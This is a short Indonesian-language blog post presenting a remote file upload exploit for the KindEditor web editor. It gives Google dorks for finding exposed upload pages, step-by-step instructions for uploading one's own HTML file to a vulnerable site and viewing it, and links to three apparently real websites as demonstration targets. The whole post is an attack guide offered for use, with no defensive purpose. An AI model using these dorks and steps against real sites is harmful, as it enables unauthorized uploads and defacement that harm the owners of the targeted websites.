RaafiSite: KindEdior Remote File Upload exploit

# Google Dork :

---------------

allinurl:/examples/uploadbutton.html

allinurl:/php/upload_json.php / .asp / .jsp

intitle:index of? inurl:kindeditor

inurl:examples/uploadbutton.html

1. Serch di Google terus pilih web yang vuln

2. exploit:http://www.vulnrabewebsite.com/path/kindeditor/examples/uploadbutton.html

3. http:// www.vulnrabewebsite.com/path/kindeditor/attached/file/[html kita].html pergi kesini

dan lihat hasil nya :)

Demo

http://www.abaiweb.com/resource/kindeditor-4.1.4/examples/uploadbutton.html

http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html

http://segrain.com/kindeditor/examples/uploadbutton.html

Laman